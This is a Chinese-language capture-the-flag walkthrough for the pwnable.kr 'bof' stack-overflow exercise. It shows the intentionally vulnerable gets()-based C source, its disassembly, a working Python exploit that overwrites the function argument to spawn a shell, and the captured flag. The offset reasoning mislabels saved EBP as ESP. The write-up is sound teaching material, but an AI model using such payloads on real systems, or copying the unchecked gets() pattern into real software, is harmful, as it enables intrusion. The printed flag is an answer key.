Nana told me that buffer overflow is one of the most common software vulnerability.
Is that true?
Download : http://pwnable.kr/bin/bof
Download : http://pwnable.kr/bin/bof.c
Running at : nc pwnable.kr 9000
简单的栈溢出练习。
源码如下:
#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
char overflowme[32];
printf("overflow me : ");
gets(overflowme); // smash me!
if(key == 0xcafebabe){
system("/bin/sh");
}
else{
printf("Nah..\n");
}
}
int main(int argc, char* argv[]){
func(0xdeadbeef);
return 0;
}
这里需要构造栈溢出,淹没至前一个栈帧的当前函数的参数位置。
linux下可以借助gdb进行动态调试,利用objdump进行静态反编译。
这里可使用objdump来静态查看栈分配情况objdump -d bof
:
由题设只需关注main()和func()
0000062c <func>:
62c: 55 push %ebp
62d: 89 e5 mov %esp,%ebp
62f: 83 ec 48 sub $0x48,%esp
632: 65 a1 14 00 00 00 mov %gs:0x14,%eax
638: 89 45 f4 mov %eax,-0xc(%ebp)
63b: 31 c0 xor %eax,%eax
63d: c7 04 24 8c 07 00 00 movl $0x78c,(%esp)
644: e8 fc ff ff ff call 645 <func+0x19> ; call printf()
649: 8d 45 d4 lea -0x2c(%ebp),%eax ; char[32] -- offset to ebp
64c: 89 04 24 mov %eax,(%esp) ; 传参
64f: e8 fc ff ff ff call 650 <func+0x24> ; call gets()
654: 81 7d 08 be ba fe ca cmpl $0xcafebabe,0x8(%ebp)
65b: 75 0e jne 66b <func+0x3f>
65d: c7 04 24 9b 07 00 00 movl $0x79b,(%esp)
664: e8 fc ff ff ff call 665 <func+0x39>
669: eb 0c jmp 677 <func+0x4b>
66b: c7 04 24 a3 07 00 00 movl $0x7a3,(%esp)
672: e8 fc ff ff ff call 673 <func+0x47>
677: 8b 45 f4 mov -0xc(%ebp),%eax
67a: 65 33 05 14 00 00 00 xor %gs:0x14,%eax
681: 74 05 je 688 <func+0x5c>
683: e8 fc ff ff ff call 684 <func+0x58>
688: c9 leave
689: c3 ret
0000068a <main>:
68a: 55 push %ebp
68b: 89 e5 mov %esp,%ebp
68d: 83 e4 f0 and $0xfffffff0,%esp
690: 83 ec 10 sub $0x10,%esp
693: c7 04 24 ef be ad de movl $0xdeadbeef,(%esp)
69a: e8 8d ff ff ff call 62c <func>
69f: b8 00 00 00 00 mov $0x0,%eax
6a4: c9 leave
6a5: c3 ret
6a6: 90 nop
可以发现 char overflowme[32]
在当前栈帧中距离EBP的偏移为0x2c,即44,再加上ESP的4,返回地址的4,即从局部变量overflowme首地址52byte的位置即为当前函数的参数key的地址。
借助python库zio(an easy-to-use io library for pwning development, supporting an unified interface for local process pwning and TCP socket io.)写脚本跑出flag。
from zio import *
host = "pwnable.kr" #143.248.249.64
port = 9000
io = zio((host, port), print_read=False, print_write=False)
payload = "a"*52 + "\xbe\xba\xfe\xca" + "\n"
io.write(payload+"\n")
io.write("cat flag\n")
buf = io.read_until("\n")
print buf
$ python run.py
daddy, I just pwned a buFFer :)
网友评论